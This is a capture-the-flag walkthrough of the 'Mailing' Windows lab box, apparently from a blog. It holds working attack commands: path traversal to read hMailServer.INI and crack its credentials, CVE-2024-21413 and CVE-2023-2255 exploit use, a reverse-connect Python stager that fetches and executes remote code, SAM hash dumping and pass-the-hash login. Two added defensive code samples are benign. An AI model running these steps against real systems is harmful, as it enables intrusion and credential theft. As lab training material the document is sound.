TCP Scan

> TARGET=10.129.58.123 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT      STATE SERVICE       REASON          VERSION
25/tcp    open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Mailing
|_http-server-header: Microsoft-IIS/10.0
110/tcp   open  pop3          syn-ack ttl 127 hMailServer pop3d
|_pop3-capabilities: USER TOP UIDL
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
143/tcp   open  imap          syn-ack ttl 127 hMailServer imapd
|_imap-capabilities: SORT IMAP4 completed CHILDREN OK QUOTA CAPABILITY RIGHTS=texkA0001 IDLE NAMESPACE ACL IMAP4rev1
445/tcp   open  microsoft-ds? syn-ack ttl 127
465/tcp   open  ssl/smtp      syn-ack ttl 127 hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp   open  smtp          syn-ack ttl 127 hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
993/tcp   open  ssl/imap      syn-ack ttl 127 hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU/emailAddress=ruy@mailing.htb/organizationalUnitName=MAILING/localityName=Madrid
|_imap-capabilities: SORT IMAP4 completed CHILDREN OK QUOTA CAPABILITY RIGHTS=texkA0001 IDLE NAMESPACE ACL IMAP4rev1
5040/tcp  open  unknown       syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?    syn-ack ttl 127
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • add hostname
echo '10.129.58.123    mailing.htb' >> /etc/hosts
  • note the address ruy@mailing.htb from the TLS certificate

web enum

> dirsearch -u http://mailing.htb -x 403,404
[23:04:53] 301 -  160B  - /assets  ->  http://mailing.htb/assets/
[23:04:53] 200 -  541B  - /assets/
[23:05:08] 200 -   31B  - /download.php
  • find accepted parameters
> wfuzz -w /usr/share/wordlists/dirb/common.txt -u "http://mailing.htb/download.php?FUZZ=test" --hh 31
000001601:   200        0 L      3 W        15 Ch       "file"

> wfuzz -w /usr/share/wordlists/Bug-Bounty-Wordlists/windows-lfi.txt -u "http://mailing.htb/download.php?file=../../../FUZZ" --hh 15
lots of results
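The download.php above hands back whatever path its file parameter points to, which is why the traversal into Program Files works. As an added example, not part of the original writeup or the target's code, this is a Python model of the check a hardened download handler needs; the directory layout built in demo() is constructed.

```python
import os
import tempfile
from urllib.parse import unquote_plus


def resolve_download(base_dir, requested):
    """Return the real path of `requested` inside `base_dir`, or None if it escapes.

    Models a hardened download.php: decode the parameter the way the server would
    ('+' becomes a space), refuse absolute paths, then resolve symlinks and '..'
    segments and confirm the result is still below the allowed directory.
    """
    base = os.path.realpath(base_dir)
    name = unquote_plus(requested)
    if os.path.isabs(name) or os.path.splitdrive(name)[0]:
        return None
    candidate = os.path.realpath(os.path.join(base, name))
    # commonpath (not startswith) so that a sibling such as "<base>2/" is also rejected
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Build a constructed web root and run the check against the writeup's inputs."""
    with tempfile.TemporaryDirectory() as root:
        docs = os.path.join(root, "assets")
        os.mkdir(docs)
        with open(os.path.join(docs, "brochure.pdf"), "w") as fh:
            fh.write("constructed sample file")
        # sensitive file outside the served directory, standing in for hMailServer.INI
        with open(os.path.join(root, "hMailServer.INI"), "w") as fh:
            fh.write("[Security]\n")
        return {
            "legit": resolve_download(docs, "brochure.pdf") is not None,
            # the traversal from the writeup, as the script receives it
            "writeup_payload": resolve_download(
                docs, "../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI"),
            "parent": resolve_download(docs, "../hMailServer.INI"),
            "encoded_parent": resolve_download(docs, "..%2FhMailServer.INI"),
            "absolute": resolve_download(docs, os.path.join(root, "hMailServer.INI")),
        }


if __name__ == "__main__":
    print(demo())
```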

hmailserver

  • from the homepage (read the PDF), learned that hMailServer is installed
  • also note the name maya
  • look up the hMailServer directory structure and locate the config file
curl -i "http://mailing.htb/download.php?file=../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI"
HTTP/1.1 200 OK
Cache-Control: must-revalidate
Pragma: public
Content-Type: application/octet-stream
Expires: 0
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.3.3
Content-Description: File Transfer
Content-Disposition: attachment; filename="hMailServer.INI"
X-Powered-By: ASP.NET
Date: Mon, 06 May 2024 03:24:18 GMT
Content-Length: 604

[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
  • crack 841bb5acfa6779ae432fd7a4e6600ba7: homenetworkingadministrator

  • decrypt the hMailServer database password

┌──(root㉿kali)-[~/workspace/Mailing]
└─# git clone https://github.com/GitMirar/hMailDatabasePasswordDecrypter.git
Cloning into 'hMailDatabasePasswordDecrypter'...
remote: Enumerating objects: 8, done.
remote: Total 8 (delta 0), reused 0 (delta 0), pack-reused 8
Receiving objects: 100% (8/8), 9.53 KiB | 3.17 MiB/s, done.

┌──(root㉿kali)-[~/workspace/Mailing]
└─# cd hMailDatabasePasswordDecrypter

┌──(root㉿kali)-[~/workspace/Mailing/hMailDatabasePasswordDecrypter]
└─# make
g++ blowfish.cpp main.cpp -o decrypt

┌──(root㉿kali)-[~/workspace/Mailing/hMailDatabasePasswordDecrypter]
└─# ./decrypt 0a9f8ad8bf896b501dde74f08efd7e4c
6FC6F69152AD

CVE-2024-21413

  • log in and check users
> telnet mailing.htb 25
USER administrator@mailing.htb
PASS homenetworkingadministrator
LIST
RETR 1
> python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.19' --subject XD
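The message sent above carries a link to the attacker's UNC path (--url '\\10.10.14.19'). As an added, defender-side example that is not part of the original writeup, this mail-gateway check flags any message whose links point at a UNC share or file: URL; the SAMPLE message is constructed to resemble that mail.

```python
import re
from email import message_from_string

# Link targets to flag: UNC paths (\\host\share\...) and file: URLs. Constructed patterns.
HREF_RE = re.compile(r'''href\s*=\s*["']([^"']+)["']''', re.IGNORECASE)
BARE_RE = re.compile(r'''(?:file:[^\s"'<>]+|\\\\[^\s"'<>]+)''', re.IGNORECASE)


def is_unc_or_file(target):
    """True for a link that would make a mail client reach out to an SMB share."""
    t = target.strip()
    return t.lower().startswith("file:") or t.startswith("\\\\")


def extract_links(msg):
    """Yield href values and bare UNC/file: tokens from every text part of the message."""
    for part in msg.walk():
        if part.get_content_type() not in ("text/plain", "text/html"):
            continue
        raw = part.get_payload(decode=True) or b""
        body = raw.decode(part.get_content_charset() or "utf-8", "replace")
        for m in HREF_RE.finditer(body):
            yield m.group(1)
        for m in BARE_RE.finditer(body):
            yield m.group(0)


def suspicious_links(raw_message):
    """Return the distinct UNC/file: link targets found in an RFC 822 message string."""
    found = []
    for link in extract_links(message_from_string(raw_message)):
        if is_unc_or_file(link) and link not in found:
            found.append(link)
    return found


# Constructed sample modelled on the message the writeup sends to maya (not a real capture).
SAMPLE = r"""From: administrator@mailing.htb
To: maya@mailing.htb
Subject: XD
Content-Type: text/html; charset=utf-8

<html><body><p>See <a href="https://mailing.htb/assets/policy.pdf">the policy</a>
and the copy at <a href="\\10.10.14.19\share\policy.docx">this link</a>.</p></body></html>
"""

if __name__ == "__main__":
    print(suspicious_links(SAMPLE))
```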

user

┌──(root㉿kali)-[~/workspace/Mailing]
└─# evil-winrm -i mailing.htb -u maya -p m4y4ngs4ri

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> type c:\users\maya\desktop\user.txt
cacd4192e46fd7b53cc5f29d083d1a88
  • create e.py and upload it to the target as C:\Users\maya\desktop\e.py
# e.py: TLS reverse-connect stager. It connects back to the listener, reads a
# 4-byte big-endian length, then a base64+zlib encoded Python payload of that
# length, and exec()s it with the socket available as 's'.
import socket
import ssl
import zlib
import base64
import struct
c2 = '10.10.14.x'   # listener address (placeholder, as in the original notes)
port = 4444
context = ssl._create_unverified_context()   # no certificate validation
with socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) as sock:
    with context.wrap_socket(sock, server_hostname=c2) as ssock:
        ssock.connect((c2, port))
        # '>I' needs exactly 4 bytes, so read only the length prefix here
        sent = struct.unpack('>I', ssock.recv(4))[0]
        payload = ssock.recv(sent)
        while len(payload) < sent:
            payload += ssock.recv(sent - len(payload))
        exec(zlib.decompress(base64.b64decode(payload)), {'s': ssock})
  • on Kali, generate the payload test.odt and upload it to c:\Important Documents\test.odt on the target
> python3 CVE-2023-2255.py --cmd 'python C:\Users\maya\desktop\e.py' --output "test.odt"
File test.odt has been created !
  • on target
> wget http://10.10.14.19/test.odt -O "c:\Important Documents\test.odt"
  • on kali
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
  • the above is not very smooth to use; try the following instead
# kali
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'

# target
wget http://10.10.14.19/exploit.odt -O "c:\Important Documents\exploit.odt"
  • check the group membership
net user maya
User name                    maya
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2024-04-12 4:16:20 AM
Password expires             Never
Password changeable          2024-04-12 4:16:20 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2024-05-06 6:21:53 AM

Logon hours allowed          All

Local Group Memberships      *Administradores      *Remote Management Use
                             *Usuarios             *Usuarios de escritori
Global Group memberships     *Ninguno
The command completed successfully.


> crackmapexec smb mailing.htb -u maya -p "m4y4ngs4ri" --sam
[*] Initializing FTP protocol database
SMB         mailing.htb     445    MAILING          [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         mailing.htb     445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         mailing.htb     445    MAILING          [+] Dumping SAM hashes
SMB         mailing.htb     445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         mailing.htb     445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         mailing.htb     445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         mailing.htb     445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         mailing.htb     445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         mailing.htb     445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         mailing.htb     445    MAILING          [+] Added 6 SAM hashes to the database

> impacket-wmiexec localadmin@mailing.htb -hashes "aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae"
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type c:\users\localadmin\desktop\root.txt
a4e7847b41fd418331a4e1585c3fea60

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack